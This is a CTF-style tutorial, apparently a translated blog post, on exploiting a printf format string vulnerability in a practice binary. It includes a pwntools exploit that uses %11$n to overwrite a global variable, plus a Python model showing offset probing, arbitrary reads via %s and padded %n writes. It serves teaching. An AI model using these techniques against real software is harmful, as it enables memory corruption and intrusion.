Stack overflow basic exercise - 5 (string vulnerability)
2022-07-23 06:15:00 【Mokapeng】
Challenge files: see pwn stack overflow basic exercises ——1, where all the exercise binaries for this blog series are collected.
fmtstr1
printf vulnerability summary
printf format string vulnerability
%s: treats the argument as a pointer and prints the string stored at that address (a read through an attacker-chosen pointer).
%p: prints the argument value itself as a pointer, so it leaks whatever happens to be in that argument slot on the stack.
%n: writes the number of characters output so far into the address given by the argument. It dereferences the argument just like %s, but where %s reads, %n writes, four bytes (an int) at a time.
Stack layout at the call printf("%p%p%p"):
"%p%p%p" is printf()'s first argument and describes the output format. Because no further arguments are supplied, printf() simply keeps reading successive argument slots up the stack and prints them.
So whenever we control the format string argument of printf(), we can easily read arbitrary data from the stack.
Tip:
printf("%3$d", a, b, c): the positional specifier 3$ prints the third format parameter directly, here c.
Leaking the contents of an arbitrary address through printf() (flow chart):
When we call printf("%p%p%p%p"), the stack looks like this:
We find that the string %p%p%p%p is stored at 0xffffd1bc, and the pointer 0xffffd1bc is stored in printf()'s first-argument slot. So if we replace %p%p%p%p with an address, that address value now sits at 0xffffd1bc. If a %s specifier can then be made to take the contents of 0xffffd1bc as its pointer, it prints whatever is stored at that address. In other words, a call of the form printf("<address value>%s"), with the %s positioned on the parameter that holds our buffer, lets us output the contents of any address.
Exercise analysis

Protections: Canary is enabled, but addresses are not randomized (no PIE), so global addresses are fixed.
Open the binary in IDA.
We find the bug printf(&buf), where the contents of buf are written by read(), so we control them:
- printf(&buf) is called with a single argument: our buffer is the format string itself
- buf can be controlled
Taken together, there is a printf() format string vulnerability.
Our goal is clearly to set x to 4; in a printf() vulnerability the %n specifier is what gives us a write.
Idea: use the printf() vulnerability with %n to change the value of x to 4.
First find the address of x in IDA; its initial value is 3.
For dynamic debugging, send AAAAAAAA as input and inspect the stack at the printf() call.
Looking at the stack: 0xffffd070 holds printf()'s first argument (the pointer to buf), and the format string parameters follow it, so 0xffffd074 is format parameter 1 and our buffer at 0xffffd09c is parameter 11. We want the start of buf (0xffffd09c) to contain the address of x, so that %11$n takes that address as its pointer and writes into x the number of bytes output so far. Since the address of x is 4 bytes long, that count is exactly 4, which is just what x = 4 requires. So the payload is printf("x_addr%11$n").
Exploit code:
from pwn import *
io = process("./fmtstr1")
# address of x (fixed, no PIE) followed by %11$n: the 4 address bytes are
# the only output before %n, so 4 is written to x
payload = p32(0x0804A02C) + b"%11$n"
io.send(payload)
io.interactive()
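To make the reasoning in the leak section and in the exploit analysis concrete without the binary, here is an added example (not the page's exploit and not pwntools) that models printf()'s argument handling in Python. The stack slots and the filler values in them, the Memory class and the "constructed secret" string are all constructed for the model; the addresses 0x0804A02C, 0xffffd09c and 0xffffd074 are taken from the write-up. It shows the three things the text describes: finding that buf is parameter 11 with AAAA%N$p probes, reading an arbitrary address with addr||%11$s, and the %n write, generalised to arbitrary values by padding the output count with %<k>c.

```python
import re
import struct

# Addresses from the write-up; everything else here is a constructed model.
X_ADDR = 0x0804A02C            # global x, initial value 3 (no PIE, so fixed)
BUF_ADDR = 0xFFFFD09C          # where buf sits on the stack at the printf call
FIRST_PARAM_ADDR = 0xFFFFD074  # format parameter 1 (0xffffd070 holds &buf)
BUF_PARAM_INDEX = (BUF_ADDR - FIRST_PARAM_ADDR) // 4 + 1   # == 11


def p32(v):
    """Little-endian 32-bit pack, the same as pwntools' p32."""
    return struct.pack("<I", v)


def u32(b):
    return struct.unpack("<I", b)[0]


class Memory:
    """Sparse byte-addressable memory standing in for the process (constructed)."""

    def __init__(self):
        self.cells = {}

    def write(self, addr, data):
        for i, b in enumerate(data):
            self.cells[addr + i] = b

    def read_u32(self, addr):
        return u32(bytes(self.cells.get(addr + i, 0) for i in range(4)))

    def read_cstr(self, addr):
        out = bytearray()
        while self.cells.get(addr, 0):
            out.append(self.cells[addr])
            addr += 1
        return bytes(out)


SPEC = re.compile(rb"%(?:(\d+)\$)?(\d*)([pcsn])")


def fmt_interpret(fmt, args, mem):
    """Model of a 32-bit printf: args[0] is format parameter 1, %N$ selects
    args[N-1], plain specifiers take the next slot in order. %p prints the
    slot, %<w>c counts w bytes, %s dereferences the slot, %n writes the number
    of bytes output so far to the address in the slot. Returns the output."""
    fmt = fmt.split(b"\x00", 1)[0]   # a C string ends at the first NUL byte
    out = bytearray()
    cursor = pos = 0
    for m in SPEC.finditer(fmt):
        out += fmt[pos:m.start()]
        pos = m.end()
        position, width, conv = m.groups()
        if position:
            idx = int(position) - 1
        else:
            idx, cursor = cursor, cursor + 1
        val = args[idx] if idx < len(args) else 0   # beyond the model: read 0
        if conv == b"p":
            out += b"0x%08x" % val
        elif conv == b"c":
            out += b" " * (int(width or 1) - 1) + bytes([val & 0xFF])
        elif conv == b"s":
            out += mem.read_cstr(val)
        elif conv == b"n":
            mem.write(val, p32(len(out)))
    out += fmt[pos:]
    return bytes(out)


def build_args(buf):
    """Argument slots as printf sees them at printf(&buf): constructed filler
    for parameters 1..10, then buf's own bytes as parameters 11, 12, ..."""
    args = [0xDEADBEE0 + i for i in range(BUF_PARAM_INDEX - 1)]
    padded = buf + b"\x00" * (-len(buf) % 4)
    args += [u32(padded[i:i + 4]) for i in range(0, len(padded), 4)]
    return args


def fmtstr1_printf(payload, mem):
    """read(0, buf, ...) followed by printf(&buf), as in the exercise."""
    mem.write(BUF_ADDR, payload + b"\x00")
    return fmt_interpret(payload, build_args(payload), mem)


def find_buf_index(limit=20):
    """Offset discovery via the %p leak: send AAAA%N$p for rising N and stop
    at the N whose output echoes 0x41414141, i.e. the parameter that is buf."""
    for n in range(1, limit + 1):
        if b"0x41414141" in fmtstr1_printf(b"AAAA%%%d$p" % n, Memory()):
            return n
    return None


def leak_string(addr, mem):
    """Arbitrary read: buf = addr || %11$s, so %s dereferences our address.
    The 4 echoed address bytes come first; return only the leaked string."""
    out = fmtstr1_printf(p32(addr) + b"%%%d$s" % BUF_PARAM_INDEX, mem)
    return out[4:]


def write_payload(addr, value, index=BUF_PARAM_INDEX):
    """The page's payload generalised: the 4 address bytes already count as 4
    output bytes; pad up to `value` with %<k>c, then %index$n writes it."""
    if value < 4:
        raise ValueError("cannot write less than the 4 address bytes already output")
    pad = b"%%%dc" % (value - 4) if value > 4 else b""
    return p32(addr) + pad + b"%%%d$n" % index


def exploit_set_x(payload):
    """Run the exercise with x = 3 and return the value of x afterwards."""
    mem = Memory()
    mem.write(X_ADDR, p32(3))
    fmtstr1_printf(payload, mem)
    return mem.read_u32(X_ADDR)


if __name__ == "__main__":
    print("buf is format parameter", find_buf_index())
    print("x after the page's payload:", exploit_set_x(p32(X_ADDR) + b"%11$n"))
    print("x after writing 0x41:", hex(exploit_set_x(write_payload(X_ADDR, 0x41))))
```

Two caveats the model makes visible: the address placed at the front of the payload must contain no 0x00 byte, because printf stops at the first NUL of its format string even though read() copied everything; and %n writes the count of bytes output so far, so writing anything other than 4 means padding the output first, which is what write_payload does with %<k>c.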